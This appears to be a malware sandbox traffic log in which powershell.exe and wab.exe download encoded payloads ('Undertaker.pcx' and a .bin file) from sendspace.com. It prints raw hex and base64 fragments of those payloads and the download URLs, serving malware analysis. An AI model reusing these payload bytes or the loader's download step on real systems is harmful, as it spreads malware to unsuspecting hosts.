                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1VdPdH%2Bcf%2Fd5ZmWnp8I9OZdnM4ZuR3wpk79m6pS022rohC7TM1Xh8aJN4to4BsthRmJnGwk6IhYRkl931cqbeHma4PPgIyr%2BxwlGv4Upmx7nu6NbBN3JTxrGEBdoJLfU2ZACg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 88875630ff708c1e-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  2024-05-23 19:08:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.44973169.31.136.174437596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-05-23 19:08:49 UTC233OUTGET /dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                  Host: fs03n2.sendspace.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-05-23 19:08:49 UTC499INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Thu, 23 May 2024 19:08:49 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 441484
                                                                                                  Last-Modified: Fri, 17 May 2024 15:05:46 GMT
                                                                                                  Connection: close
                                                                                                  Set-Cookie: SID=5ms0jssd7vh4dfc0pn75bs45h1; path=/; domain=.sendspace.com
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  Content-Disposition: attachment;filename="Undertaker.pcx"
                                                                                                  ETag: "6647724a-6bc8c"
                                                                                                  Accept-Ranges: bytes
                                                                                                  2024-05-23 19:08:49 UTC15885INData Raw: 36 77 4a 6a 4f 33 45 42 6d 37 73 41 7a 42 4d 41 63 51 47 62 36 77 49 4a 47 41 4e 63 4a 41 54 72 41 69 52 57 36 77 49 55 66 62 6e 61 48 45 38 39 63 51 47 62 63 51 47 62 67 66 46 61 72 4f 43 4d 63 51 47 62 36 77 4b 56 43 34 48 78 67 4c 43 76 73 65 73 43 38 37 62 72 41 70 65 74 36 77 4c 61 6b 33 45 42 6d 37 72 36 55 58 36 53 36 77 4c 67 38 2b 73 43 49 68 6a 72 41 68 6b 57 36 77 49 76 38 7a 48 4b 63 51 47 62 36 77 49 6a 76 59 6b 55 43 2b 73 43 74 79 31 78 41 5a 76 52 34 6e 45 42 6d 2b 73 43 58 77 47 44 77 51 52 78 41 5a 76 72 41 69 47 79 67 66 6e 41 4a 68 34 43 66 4d 70 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 63 51 47 62 63 51 47 62 69 63 50 72 41 6f 53 4f 63 51 47 62 67 63 4d 2f 68 62 55 42 63 51 47 62 36 77 49 79 2b 72 72 2f 39 78 72 4f 63 51 47 62 63 51 47
                                                                                                  Data Ascii: 6wJjO3EBm7sAzBMAcQGb6wIJGANcJATrAiRW6wIUfbnaHE89cQGbcQGbgfFarOCMcQGb6wKVC4HxgLCvsesC87brApet6wLak3EBm7r6UX6S6wLg8+sCIhjrAhkW6wIv8zHKcQGb6wIjvYkUC+sCty1xAZvR4nEBm+sCXwGDwQRxAZvrAiGygfnAJh4CfMpxAZtxAZuLRCQEcQGbcQGbicPrAoSOcQGbgcM/hbUBcQGb6wIy+rr/9xrOcQGbcQG
                                                                                                  2024-05-23 19:08:49 UTC16384INData Raw: 54 35 65 56 45 44 6a 77 4f 63 53 38 62 75 56 53 34 68 35 7a 54 5a 50 65 4d 71 75 6e 77 50 4e 37 4f 32 6e 77 4a 2f 44 37 57 79 6b 2f 72 38 69 38 6d 57 72 51 43 49 5a 4f 73 4d 69 64 61 35 46 74 33 48 57 67 67 64 2f 78 73 42 58 6d 6e 6a 34 71 70 48 55 51 4b 51 45 44 78 32 73 35 73 71 64 63 71 53 7a 61 47 42 2f 59 58 71 77 49 75 48 63 63 6f 31 38 6d 31 46 58 74 7a 4a 49 44 65 42 49 63 70 55 7a 31 44 61 46 74 77 4a 4b 41 2b 36 30 6f 50 36 2f 4a 76 70 5a 71 2f 30 37 45 54 6b 75 49 64 55 48 61 34 4c 7a 38 4a 47 61 65 37 4c 4d 59 31 75 4d 34 47 74 61 35 70 36 56 35 2b 61 61 70 65 6d 44 31 50 46 69 4e 6b 78 2b 50 7a 54 46 38 7a 4b 4f 67 2b 7a 54 44 4d 41 54 50 54 77 4e 78 6a 69 41 33 30 68 50 63 5a 6b 39 76 77 50 77 6e 37 48 74 6b 6d 2f 72 30 63 54 30 2f 77 34 55
                                                                                                  Data Ascii: T5eVEDjwOcS8buVS4h5zTZPeMqunwPN7O2nwJ/D7Wyk/r8i8mWrQCIZOsMida5Ft3HWggd/xsBXmnj4qpHUQKQEDx2s5sqdcqSzaGB/YXqwIuHcco18m1FXtzJIDeBIcpUz1DaFtwJKA+60oP6/JvpZq/07ETkuIdUHa4Lz8JGae7LMY1uM4Gta5p6V5+aapemD1PFiNkx+PzTF8zKOg+zTDMATPTwNxjiA30hPcZk9vwPwn7Htkm/r0cT0/w4U
                                                                                                  2024-05-23 19:08:49 UTC16384INData Raw: 65 50 41 31 36 6c 4a 56 30 51 31 6d 4d 43 54 73 4f 73 6f 6c 50 36 58 62 74 50 44 4c 67 35 54 6c 47 75 7a 38 69 42 7a 49 61 61 4c 4e 55 39 6a 69 75 58 62 75 6b 76 4a 30 37 63 6d 36 69 56 4f 65 67 67 7a 30 57 44 76 53 5a 75 6a 32 76 63 76 55 48 45 44 77 72 6d 64 48 66 44 61 57 53 2f 68 39 70 6a 42 37 77 6c 50 74 4b 47 44 64 4c 2f 4e 4a 73 43 55 37 30 41 50 61 4f 74 44 76 75 61 67 2b 63 57 59 31 63 6e 45 67 44 32 7a 4f 6d 46 36 49 6e 4b 64 50 6e 4b 56 37 79 6f 31 37 37 63 79 66 42 45 72 36 48 4b 4e 73 55 36 44 4f 57 42 5a 65 6f 51 33 2b 32 35 61 37 4c 58 35 32 74 4b 56 4f 62 68 58 35 67 6b 78 52 58 4c 76 56 68 52 36 47 4b 6f 31 72 73 44 76 4e 6b 33 6b 75 77 68 41 6b 6c 68 55 6c 32 7a 68 72 46 6a 77 42 4a 68 42 79 37 74 6f 6f 33 61 79 61 55 36 2b 50 76 72 4e
                                                                                                  Data Ascii: ePA16lJV0Q1mMCTsOsolP6XbtPDLg5TlGuz8iBzIaaLNU9jiuXbukvJ07cm6iVOeggz0WDvSZuj2vcvUHEDwrmdHfDaWS/h9pjB7wlPtKGDdL/NJsCU70APaOtDvuag+cWY1cnEgD2zOmF6InKdPnKV7yo177cyfBEr6HKNsU6DOWBZeoQ3+25a7LX52tKVObhX5gkxRXLvVhR6GKo1rsDvNk3kuwhAklhUl2zhrFjwBJhBy7too3ayaU6+PvrN
                                                                                                  2024-05-23 19:08:49 UTC16384INData Raw: 5a 79 66 42 7a 53 33 41 36 31 61 44 74 71 4f 2b 33 62 42 6a 65 56 6e 57 4f 44 79 71 6d 46 36 51 70 58 32 4a 6e 4b 56 51 6c 6a 59 36 4c 63 79 39 48 63 34 38 6e 4b 6c 43 45 54 70 77 32 52 5a 65 6f 41 33 2f 32 37 6d 37 62 37 37 6b 6e 30 2b 62 52 35 53 4b 63 66 70 70 71 6e 79 58 6e 4b 46 4c 31 73 63 54 4e 54 37 73 38 71 36 55 53 78 6c 34 53 36 45 43 70 57 56 39 50 4f 6f 4f 4e 33 62 4a 67 31 5a 66 34 64 2f 50 73 74 65 33 76 7a 55 5a 50 4a 45 59 49 39 75 30 63 42 55 69 79 67 6a 51 5a 6a 39 53 77 54 5a 61 59 31 36 37 79 33 48 38 32 4b 50 58 61 67 69 6f 45 51 43 56 51 79 4e 6a 6a 4f 50 79 64 2f 55 63 45 51 43 54 6d 35 30 6a 65 50 66 70 68 7a 49 5a 6b 51 61 46 6a 79 5a 46 4f 73 33 70 43 78 42 38 53 4e 6a 31 37 76 4d 58 77 2f 64 77 6e 35 4b 46 51 73 63 49 34 4a 42
                                                                                                  Data Ascii: ZyfBzS3A61aDtqO+3bBjeVnWODyqmF6QpX2JnKVQljY6Lcy9Hc48nKlCETpw2RZeoA3/27m7b77kn0+bR5SKcfppqnyXnKFL1scTNT7s8q6USxl4S6ECpWV9POoON3bJg1Zf4d/Pste3vzUZPJEYI9u0cBUiygjQZj9SwTZaY167y3H82KPXagioEQCVQyNjjOPyd/UcEQCTm50jePfphzIZkQaFjyZFOs3pCxB8SNj17vMXw/dwn5KFQscI4JB
                                                                                                  2024-05-23 19:08:49 UTC16384INData Raw: 6b 71 52 58 35 68 73 73 6a 42 79 55 71 2b 2b 7a 6b 32 33 39 51 38 38 75 51 7a 32 72 79 46 42 39 6b 2f 2f 30 6e 64 6e 55 44 49 31 70 79 59 43 38 32 44 2b 2b 46 54 6a 42 75 72 4d 53 2b 56 45 77 32 65 55 31 74 70 61 2f 45 54 7a 5a 7a 68 2b 52 46 72 49 54 47 37 69 4e 4d 58 7a 32 57 59 49 70 59 47 33 42 76 47 33 6d 59 56 79 6b 57 33 55 30 50 2b 33 4c 76 62 52 45 33 7a 79 75 72 31 59 63 32 41 32 78 58 65 4d 38 63 56 4d 73 76 57 52 43 2b 4d 32 69 2b 62 4c 4f 6b 54 44 78 56 42 69 4e 2b 4d 47 6f 78 74 45 79 50 77 69 36 34 75 79 38 57 49 32 65 68 73 58 43 46 68 79 6a 65 66 62 59 59 53 33 4d 6c 47 72 58 46 78 33 6c 4c 63 79 51 76 7a 77 36 76 4b 61 76 58 69 45 59 44 62 46 63 68 39 43 61 4b 74 69 4e 73 70 33 72 38 63 36 44 4b 55 32 75 54 4a 4c 76 30 53 4f 48 6c 36 36
                                                                                                  Data Ascii: kqRX5hssjByUq++zk239Q88uQz2ryFB9k//0ndnUDI1pyYC82D++FTjBurMS+VEw2eU1tpa/ETzZzh+RFrITG7iNMXz2WYIpYG3BvG3mYVykW3U0P+3LvbRE3zyur1Yc2A2xXeM8cVMsvWRC+M2i+bLOkTDxVBiN+MGoxtEyPwi64uy8WI2ehsXCFhyjefbYYS3MlGrXFx3lLcyQvzw6vKavXiEYDbFch9CaKtiNsp3r8c6DKU2uTJLv0SOHl66
                                                                                                  2024-05-23 19:08:49 UTC16384INData Raw: 63 37 4a 4f 6e 4a 4b 42 72 49 54 51 62 66 31 64 51 59 56 57 58 4b 5a 61 5a 69 46 4b 72 66 31 33 52 78 4c 33 33 72 2f 61 38 66 7a 59 6f 31 38 30 76 58 71 6f 38 71 68 74 77 59 6b 72 74 36 45 63 70 47 63 69 7a 6f 58 74 7a 62 4e 77 6f 43 75 38 72 71 39 57 4b 35 67 4e 73 57 56 35 2b 37 35 54 61 55 32 78 2f 66 4f 33 30 54 44 51 30 62 34 59 67 53 7a 48 70 58 6e 39 6b 54 44 35 78 62 37 5a 4f 4d 47 49 51 4b 65 6a 73 42 71 2f 6e 62 47 33 76 65 71 68 66 42 62 35 77 4c 7a 66 46 48 41 32 4a 54 31 6f 58 4a 69 64 63 53 73 65 4c 66 46 79 61 6f 48 47 33 4a 4b 37 57 49 66 69 67 75 73 46 39 6b 75 54 48 37 4a 4e 38 58 7a 32 31 52 37 52 45 65 33 4f 76 6a 51 5a 2b 71 56 35 2f 35 45 41 6e 4d 35 79 53 4c 6a 39 37 37 61 61 52 4a 45 4d 6e 51 54 2f 42 51 45 74 7a 35 51 65 44 63 4e
                                                                                                  Data Ascii: c7JOnJKBrITQbf1dQYVWXKZaZiFKrf13RxL33r/a8fzYo180vXqo8qhtwYkrt6EcpGcizoXtzbNwoCu8rq9WK5gNsWV5+75TaU2x/fO30TDQ0b4YgSzHpXn9kTD5xb7ZOMGIQKejsBq/nbG3veqhfBb5wLzfFHA2JT1oXJidcSseLfFyaoHG3JK7WIfigusF9kuTH7JN8Xz21R7REe3OvjQZ+qV5/5EAnM5ySLj977aaRJEMnQT/BQEtz5QeDcN
                                                                                                  2024-05-23 19:08:49 UTC16384INData Raw: 2b 50 42 57 64 6a 49 33 6b 51 63 6c 79 43 50 62 75 50 78 30 2f 31 46 50 4a 4e 76 36 39 44 4d 7a 66 2b 7a 48 34 35 2f 42 5a 4d 78 69 55 6d 6c 70 65 59 6c 75 44 79 52 43 57 59 2f 63 65 44 4e 6a 71 76 48 62 46 4e 6a 57 32 65 71 55 76 7a 36 47 6a 77 4b 55 71 33 69 7a 39 79 73 34 77 4c 68 49 74 39 6a 51 61 4c 62 64 31 49 38 6f 37 63 30 42 56 6b 6a 74 33 4b 54 67 57 67 70 30 57 42 5a 65 6f 51 33 79 32 35 62 39 72 6e 32 59 65 46 69 4d 4d 6e 6d 51 61 4b 34 61 71 45 32 55 59 76 2b 38 75 6c 30 6f 4f 66 46 34 33 44 49 79 59 68 38 43 43 48 67 69 37 34 45 67 31 31 65 7a 34 79 47 41 48 4d 6c 68 63 79 56 38 51 62 64 79 7a 61 62 79 71 6c 76 79 76 4b 71 57 63 58 7a 59 6a 62 46 38 32 49 32 78 66 4e 69 49 4b 4a 64 52 56 4a 51 6d 41 6f 30 30 71 70 76 49 6c 4a 36 6d 6d 56 2b
                                                                                                  Data Ascii: +PBWdjI3kQclyCPbuPx0/1FPJNv69DMzf+zH45/BZMxiUmlpeYluDyRCWY/ceDNjqvHbFNjW2eqUvz6GjwKUq3iz9ys4wLhIt9jQaLbd1I8o7c0BVkjt3KTgWgp0WBZeoQ3y25b9rn2YeFiMMnmQaK4aqE2UYv+8ul0oOfF43DIyYh8CCHgi74Eg11ez4yGAHMlhcyV8QbdyzabyqlvyvKqWcXzYjbF82I2xfNiIKJdRVJQmAo00qpvIlJ6mmV+
                                                                                                  2024-05-23 19:08:49 UTC16384INData Raw: 6c 57 2f 65 4c 42 67 4e 73 56 4d 48 37 76 70 79 75 50 4e 35 78 59 38 50 6b 51 45 43 63 72 51 71 75 50 5a 6d 2b 61 62 77 6b 51 45 32 6a 32 46 6d 44 57 39 65 4c 42 67 4e 73 55 4c 69 72 44 67 38 47 4b 2f 63 41 4a 6a 4e 73 56 36 70 47 42 4f 52 70 4d 33 78 66 4f 4b 48 4d 54 7a 59 6c 34 66 31 46 58 56 52 4e 39 47 63 78 55 2b 74 62 66 78 31 78 46 69 70 74 6d 56 38 66 52 68 31 31 31 45 39 30 59 74 4f 51 61 38 33 75 44 72 59 54 5a 41 4f 4f 32 7a 62 76 4a 69 4e 6b 35 47 79 54 66 46 38 77 54 42 42 72 38 49 76 30 43 4c 59 44 62 46 6c 56 76 76 54 41 73 79 6e 32 2b 6b 56 6d 5a 4f 64 68 6f 30 78 66 50 72 6f 78 7a 79 59 6a 5a 4d 41 54 43 39 55 43 70 6a 4e 73 56 32 73 64 37 6d 39 57 45 32 52 51 6a 4f 76 30 41 59 59 7a 62 46 6c 5a 58 78 2f 64 44 72 7a 70 57 56 57 2b 35 4f
                                                                                                  Data Ascii: lW/eLBgNsVMH7vpyuPN5xY8PkQECcrQquPZm+abwkQE2j2FmDW9eLBgNsULirDg8GK/cAJjNsV6pGBORpM3xfOKHMTzYl4f1FXVRN9GcxU+tbfx1xFiptmV8fRh111E90YtOQa83uDrYTZAOO2zbvJiNk5GyTfF8wTBBr8Iv0CLYDbFlVvvTAsyn2+kVmZOdho0xfProxzyYjZMATC9UCpjNsV2sd7m9WE2RQjOv0AYYzbFlZXx/dDrzpWVW+5O
                                                                                                  2024-05-23 19:08:49 UTC16384INData Raw: 72 66 4d 55 58 37 77 57 45 54 70 34 66 58 4e 65 6e 72 36 63 36 6a 46 74 64 66 63 4a 6d 70 78 74 72 45 6f 48 4d 45 46 43 31 62 42 76 79 31 6b 59 77 6e 77 34 42 7a 46 74 64 6c 51 2b 35 4e 7a 55 4d 4f 4f 41 78 79 63 6f 47 46 6e 33 76 74 75 59 2b 48 31 77 58 6f 36 4d 67 6c 4c 33 4d 77 4c 6a 6e 52 57 56 79 4c 4b 53 71 30 32 63 47 5a 39 44 4d 77 2f 79 74 34 4e 45 42 54 4d 56 2f 50 63 79 36 32 2f 39 59 75 69 48 56 5a 75 4f 6c 6d 49 41 42 61 70 56 38 32 2b 4b 4d 35 5a 79 37 61 5a 36 54 41 4c 50 7a 4f 31 4b 2b 39 63 70 39 6c 59 6c 54 72 36 63 48 70 76 4e 36 65 51 4f 69 42 62 59 58 4a 58 63 64 31 44 54 35 59 45 63 51 43 51 6f 41 6e 65 71 42 58 55 68 6d 45 39 6b 55 71 44 65 56 36 31 30 39 6b 33 51 42 34 6e 7a 74 57 35 5a 37 6f 54 37 55 59 30 69 46 47 46 63 58 64 45
                                                                                                  Data Ascii: rfMUX7wWETp4fXNenr6c6jFtdfcJmpxtrEoHMEFC1bBvy1kYwnw4BzFtdlQ+5NzUMOOAxycoGFn3vtuY+H1wXo6MglL3MwLjnRWVyLKSq02cGZ9DMw/yt4NEBTMV/Pcy62/9YuiHVZuOlmIABapV82+KM5Zy7aZ6TALPzO1K+9cp9lYlTr6cHpvN6eQOiBbYXJXcd1DT5YEcQCQoAneqBXUhmE9kUqDeV6109k3QB4nztW5Z7oT7UY0iFGFcXdE
                                                                                                  2024-05-23 19:08:49 UTC16384INData Raw: 2f 37 71 64 63 45 68 32 56 56 6d 42 34 78 51 48 50 59 42 67 48 61 6a 34 65 50 6d 72 71 7a 49 35 41 39 76 4b 30 44 6c 59 38 72 7a 6b 44 70 66 33 32 4a 53 4e 61 62 7a 76 55 43 2f 59 7a 62 46 6f 39 6f 53 31 52 63 47 41 38 37 47 38 42 6e 41 5a 35 6a 64 79 73 59 52 38 45 4e 51 56 2f 38 55 46 35 71 2f 31 53 33 51 67 59 74 44 5a 41 57 33 34 31 74 2f 6e 73 34 61 49 6e 61 56 4f 61 35 51 6d 47 4e 67 79 49 33 71 34 35 78 76 64 47 37 75 64 67 34 33 78 66 4d 78 6a 65 77 6c 67 74 56 45 4d 4c 59 2f 62 43 2f 6a 39 52 6d 4e 46 41 6c 4d 36 44 67 45 32 33 65 55 41 59 38 6c 6f 58 38 33 66 57 56 6a 4c 4c 34 50 45 4d 7a 4b 31 50 47 43 6c 44 6b 31 51 50 64 6a 4e 73 56 36 34 5a 4c 46 38 32 4a 68 65 76 61 30 4a 4c 68 79 6a 62 4b 46 4a 57 43 33 4b 6e 4c 32 43 72 2b 68 2f 72 38 6e
                                                                                                  Data Ascii: /7qdcEh2VVmB4xQHPYBgHaj4ePmrqzI5A9vK0DlY8rzkDpf32JSNabzvUC/YzbFo9oS1RcGA87G8BnAZ5jdysYR8ENQV/8UF5q/1S3QgYtDZAW341t/ns4aInaVOa5QmGNgyI3q45xvdG7udg43xfMxjewlgtVEMLY/bC/j9RmNFAlM6DgE23eUAY8loX83fWVjLL4PEMzK1PGClDk1QPdjNsV64ZLF82Jheva0JLhyjbKFJWC3KnL2Cr+h/r8n


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.449738172.67.170.1054437244C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-05-23 19:09:13 UTC175OUTGET /pro/dl/g1h76h HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                  Host: www.sendspace.com
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-05-23 19:09:14 UTC957INHTTP/1.1 301 Moved Permanently
                                                                                                  Date: Thu, 23 May 2024 19:09:14 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: SID=7snc8sd5begfi8v3gnpjgpo9j3; path=/; domain=.sendspace.com
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  Pragma: no-cache
                                                                                                  Location: https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BPw3YxTkJ%2FCIz1hG%2FfVS8W3ggG0knfNtsS4eneT0tajbq9Sk4HditUT7DJxj85Vz7QvKZDG7uD6wOcOf9Nr1KvTcIyqvG14YNnw4Ix5LuOLzJlZnBmfsmI%2F20jrzpqFOnx0BAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 888756d24a2e4356-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  2024-05-23 19:09:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.44973969.31.136.574437244C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-05-23 19:09:15 UTC313OUTGET /dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                  Cache-Control: no-cache
                                                                                                  Host: fs13n4.sendspace.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Cookie: SID=7snc8sd5begfi8v3gnpjgpo9j3
                                                                                                  2024-05-23 19:09:15 UTC439INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Thu, 23 May 2024 19:09:15 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 106048
                                                                                                  Last-Modified: Fri, 17 May 2024 15:04:46 GMT
                                                                                                  Connection: close
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  Content-Disposition: attachment;filename="ZzDmwvhJScPuYqxiGHOFrHH77.bin"
                                                                                                  ETag: "6647720e-19e40"
                                                                                                  Accept-Ranges: bytes
                                                                                                  2024-05-23 19:09:15 UTC15945INData Raw: 8c ae 15 a1 9f 09 89 d5 3a 8f 07 53 c6 e8 b2 25 be 9b 53 40 69 f0 79 82 28 b6 20 5f 08 40 1a 03 66 84 42 fa ee f5 ee 13 95 62 2b a2 18 de 15 e2 40 d9 30 57 be 22 59 af e8 ef 13 bf e8 f9 8b a4 3e 2e a5 0c 3a 85 73 18 d8 75 1b 54 c5 cd 90 0e d2 0e e0 8b b3 40 64 23 7f 53 b4 c7 31 62 f2 89 c0 73 36 ce 01 1c fe f1 3d 06 70 82 58 02 5f 18 80 c2 d9 e7 ce bd 20 36 0f 61 10 35 67 4a 4b ee 98 0d fe 90 b6 96 37 f6 86 2c 4b 38 27 d0 6d d5 b3 56 7c 4e ec dd 7f 88 1b 08 c6 d6 53 b5 b6 82 0f 15 7b 09 e5 93 cd b7 23 40 13 b4 31 da 03 d1 8d 02 5c b9 bd 12 79 4b c8 56 36 a3 13 af 5f 39 4f d1 56 7d 70 db a9 fa 2c 95 e3 93 4f 4b 01 5b b6 5d d4 32 2f bd b9 01 25 30 6d 69 35 7a 0a d7 2b e2 1c fc 7f f4 67 92 c0 62 ef 82 a6 a4 b4 e1 98 66 8d 1f 74 5a 59 7f 0b 44 7c a2 9a 44 52
                                                                                                  Data Ascii: :S%S@iy( _@fBb+@0W"Y>.:suT@d#S1bs6=pX_ 6a5gJK7,K8'mV|NS{#@1\yKV6_9OV}p,OK[]2/%0mi5z+gbftZYD|DR
                                                                                                  2024-05-23 19:09:15 UTC16384INData Raw: 1e bf 31 c0 ee 49 33 fa 12 bf e5 50 02 3a 50 8d c8 27 b2 fd 11 b2 8d 52 b5 a5 1e 34 d5 fe 9f 43 1f 81 07 b0 35 0c 4b 55 7a bc 6c 07 e9 d7 6a ab d2 57 3f 0a 80 3c ac 7f 47 d8 2e 5e 40 35 db ba b4 e0 91 f7 10 73 cc 71 d9 d3 dd e5 bc 4b 0d 6c 36 fb e9 1d 01 97 72 16 84 01 2b 1a 98 3c 33 77 46 ee e1 64 5d b2 0f 7b 34 e7 49 43 60 a4 28 bc d7 2c 09 2a 7d c4 7f 58 49 c9 51 77 35 26 72 f8 cf 53 9f 18 b3 25 42 3c 12 05 f4 42 58 5e cc 51 27 3f 93 b3 7b b8 de 65 c4 3e 5b 76 ce f0 54 39 14 89 c7 2f f6 82 50 ae 74 19 0b 7f 2f a3 69 d0 6f 4e 97 ca 21 44 fe 11 d0 46 43 08 28 43 6c fe 70 2b 08 d8 b9 fb e0 57 00 5f 11 3e 36 f4 a0 d4 8c ae c2 f6 02 78 e4 73 f9 ca c9 e0 6b bf 36 36 14 98 7f a5 b9 c8 77 d4 55 56 92 12 6a f5 8a 1e 16 44 75 88 0a 48 2e 60 08 d0 de 19 58 6c af
                                                                                                  Data Ascii: 1I3P:P'R4C5KUzljW?<G.^@5sqKl6r+<3wFd]{4IC`(,*}XIQw5&rS%B<BX^Q'?{e>[vT9/Pt/ioN!DFC(Clp+W_>6xsk66wUVjDuH.`Xl
                                                                                                  2024-05-23 19:09:15 UTC16384INData Raw: 98 23 12 49 87 da de 3e a1 08 74 c8 ec 0d b8 9c bb 9d 78 85 87 12 2d fb 4f 95 b7 a2 70 e0 78 44 28 09 15 0a ba 4c 2a 8a 9e 13 97 f8 43 a5 00 b2 5e 23 1b 7e 82 a1 01 fe 04 20 ee c3 9f 13 97 52 cb 34 8d 21 4d cf ed eb 7f 7f 65 3e 2e fe 34 60 6a cc 02 34 9a 71 45 78 75 57 48 2d 65 ac 5c eb 30 b6 ed 37 66 af ee 8a f1 e0 8a b3 0f 25 e1 0d a1 34 40 4a a3 36 cc 1e 04 01 39 b4 e2 74 7f d5 61 b4 48 13 de e6 5c 80 d9 b9 08 f0 43 ff bf ae 79 14 27 b6 13 f0 c3 d3 de fc 9c e8 4a 32 1f 3e 17 49 a0 d5 56 d2 38 cc 1e 71 0a bd b5 dc 98 88 ac 08 49 0b 5c 8c e0 10 98 87 cc 26 35 55 74 bf cf 55 be c7 0e db c3 1b 3f a9 47 62 07 9b f9 35 fc a4 8d 2d 6f 83 4f bd a3 47 38 60 eb 7e fb a2 cd 5e a1 8a d4 2b 0a eb d3 89 53 0e 30 11 3e 6d b1 4d 09 77 b0 ac 50 aa 35 98 df 4c 8c fb 0a
                                                                                                  Data Ascii: #I>tx-OpxD(L*C^#~ R4!Me>.4`j4qExuWH-e\07f%4@J69taH\Cy'J2>IV8qI\&5UtU?Gb5-oOG8`~^+S0>mMwP5L
                                                                                                  2024-05-23 19:09:15 UTC16384INData Raw: 8f 5e c4 85 da 9f 8b 48 27 21 25 40 4c c0 dd d6 ff 63 d1 48 02 3c 98 64 79 e3 df 4f 23 a1 0c 11 a1 56 d9 d6 20 a8 0b 9b 68 e6 91 9b 41 39 7a b1 91 56 87 52 4c 4d 76 b2 59 fe 57 e1 af f6 78 a3 26 87 62 56 9a 3b 6d 99 3c e4 69 70 1c 61 e1 78 92 6c 13 54 30 ca 3b bb 07 cd 75 06 fe eb 15 f5 2a 15 31 41 e8 cb de 5d 9f 5f 2c 49 27 83 e7 95 ee c4 48 96 43 25 3e dc 9e fb 7a 4d 51 01 68 be 57 22 c2 b6 71 eb 30 cb b9 00 4a a1 0c 37 74 48 49 b1 69 fa b0 5d 62 53 d5 e2 6c c1 a5 12 d3 4e 68 42 92 65 83 e9 77 bd ff 73 d1 03 d1 02 d1 92 d2 b3 1a 49 dc ea b7 d9 4c 2a 28 2b 9a 28 d4 4d d0 71 33 87 db 8b 85 57 a9 4d ee b9 19 5c 62 46 dd 8d 41 d9 73 18 d1 c7 44 56 9b d6 23 e3 0b d0 7a 6b 8e 31 db 62 40 67 4a 6a be b4 94 22 9f 2d 40 a5 fe 70 e2 e1 c9 fa 98 be 28 6a a6 00 b1
                                                                                                  Data Ascii: ^H'!%@LcH<dyO#V hA9zVRLMvYWx&bV;m<ipaxlT0;u*1A]_,I'HC%>zMQhW"q0J7tHIi]bSlNhBewsIL*(+(Mq3WM\bFAsDV#zk1b@gJj"-@p(j
